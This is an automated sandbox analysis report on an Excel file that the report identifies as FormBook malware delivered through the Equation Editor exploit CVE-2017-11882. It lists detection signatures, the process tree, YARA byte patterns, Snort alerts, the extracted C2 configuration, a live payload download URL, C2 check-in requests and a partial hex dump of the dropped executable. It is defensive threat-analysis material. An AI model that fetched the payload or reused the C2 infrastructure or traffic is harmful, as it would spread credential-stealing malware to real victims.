Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ HCI20220113.xlsx

Overview

General Information

Sample Name:RFQ HCI20220113.xlsx
Analysis ID:552850
MD5:da4befa8dfe9d56b937b01a2d2818175
SHA1:cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
SHA256:87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2016 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2540 cmdline: "C:\Users\Public\vbc.exe" MD5: 83AC585E99B527EEB278702F8F711568)
      • vbc.exe (PID: 2712 cmdline: C:\Users\Public\vbc.exe MD5: 83AC585E99B527EEB278702F8F711568)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2568 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.485410908.0000000002611000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 31 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.0.vbc.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.vbc.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.0.vbc.exe.400000.9.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
          • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
          • 0x15d18:$sqlite3text: 68 38 2A 90 C5
          • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
          • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
          5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 24 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.213.59, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2016, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2016, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2016, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2540

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.topeasyip.company/i5nb/"], "decoy": ["integratedheartspsychology.com", "tappsis.land", "norfg.com", "1531700.win", "oneplusoneexperience.com", "circlessalaries.com", "tlcremodelingcompany.com", "susalud.info", "liyanghua.club", "pink-zemi.com", "orphe.biz", "themodelclarified.com", "candidate.tools", "morotrip.com", "d2dfms.com", "leisuresabah.com", "bjbwx114.com", "lz-fcaini1718-hw0917-bs.xyz", "at-commerce-co.net", "buymypolicy.net", "5151vip73.com", "rentglide.com", "louiecruzbeltran.info", "lanabasargina.com", "lakeforestparkapartments.com", "guangkaiyinwu.com", "bornthin.com", "restaurantkitchenbuilders.com", "ecommerceoptimise.com", "datahk99.com", "markfwalker.com", "granitowawarszawa.com", "theyouthwave.com", "iabg.xyz", "jholbrook.com", "bsc.promo", "xn--grlitzerseebhne-8sb7i.com", "cafeteriasula.com", "plushcrispies.com", "dedicatedvirtualassistance.com", "ventura-taxi.com", "thoethertb434-ocn.xyz", "ylhwcl.com", "bigsyncmusic.biz", "terapiaholisticaemformacao.com", "comidies.com", "171diproad.com", "07dgj.xyz", "vppaintllc.com", "thepatriottutor.com", "wxfive.com", "ceinpsico.com", "tuningelement.store", "asinment.com", "diafraz.xyz", "8crhnwh658ga.biz", "redwolf-tech.com", "ksherfan.com", "sensationalshroom.com", "buy-instagram-followers.net", "treeserviceconsulting.com", "vnln.space", "kate-films.com", "selfmeta.club"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: RFQ HCI20220113.xlsxVirustotal: Detection: 33%Perma Link
            Source: RFQ HCI20220113.xlsxReversingLabs: Detection: 30%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Antivirus detection for URL or domainShow sources
            Source: http://198.23.213.59/1155/vbc.exeAvira URL Cloud: Label: malware
            Source: www.topeasyip.company/i5nb/Avira URL Cloud: Label: malware
            Source: http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==Avira URL Cloud: Label: malware
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: HEUR/AGEN.1211287
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeAvira: detection malicious, Label: HEUR/AGEN.1211287
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 43%
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 43%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
            Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.vbc.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000002.520863272.0000000000A50000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483549508.0000000000740000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.482084370.00000000005E0000.00000004.00000001.sdmp, cmd.exe
            Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.519388650.000000000054A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000003.519365652.000000000050C000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.520545491.0000000000470000.00000040.00020000.sdmp
            Source: global trafficDNS query: name: www.orphe.biz
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop esi5_2_0041584D
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_004162F6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi7_2_000D62F6
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop esi7_2_000D584D
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.23.213.59:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 103.224.212.220:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 122.10.28.11:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49172 -> 192.185.98.251:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.terapiaholisticaemformacao.com
            Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.220 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 195.211.74.112 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.ylhwcl.com
            Source: C:\Windows\explorer.exeDomain query: www.integratedheartspsychology.com
            Source: C:\Windows\explorer.exeDomain query: www.circlessalaries.com
            Source: C:\Windows\explorer.exeNetwork Connect: 221.121.143.148 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.topeasyip.company
            Source: C:\Windows\explorer.exeNetwork Connect: 216.172.160.188 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 23.80.120.93 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.ecommerceoptimise.com
            Source: C:\Windows\explorer.exeNetwork Connect: 122.10.28.11 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.bjbwx114.com
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.98.251 80Jump to behavior
            Source: C:\Windows\explorer.exeDomain query: www.orphe.biz
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.topeasyip.company/i5nb/
            Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
            Source: Joe Sandbox ViewASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1Host: www.orphe.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.circlessalaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA== HTTP/1.1Host: www.ylhwcl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.terapiaholisticaemformacao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw== HTTP/1.1Host: www.ecommerceoptimise.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr HTTP/1.1Host: www.integratedheartspsychology.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw== HTTP/1.1Host: www.bjbwx114.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 103.224.212.220 103.224.212.220
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 02:21:54 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26Last-Modified: Thu, 13 Jan 2022 22:04:27 GMTETag: "66000-5d57ddeb75e04"Accept-Ranges: bytesContent-Length: 417792Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 3f e0 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 06 00 00 08 00 00 00 00 00 00 3a 75 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 74 06 00 57 00 00 00 00 80 06 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 55 06 00 00 20 00 00 00 56 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 06 00 00 06 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 75 06 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 46 06 00 64 2e 00 00 03 00 00 00 2d 00 00 06 f8 5d 00 00 84 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 17 00 00 0a 02 03 7d 01 00 00 04 02 28 18 00 00 0a 6f 19 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7
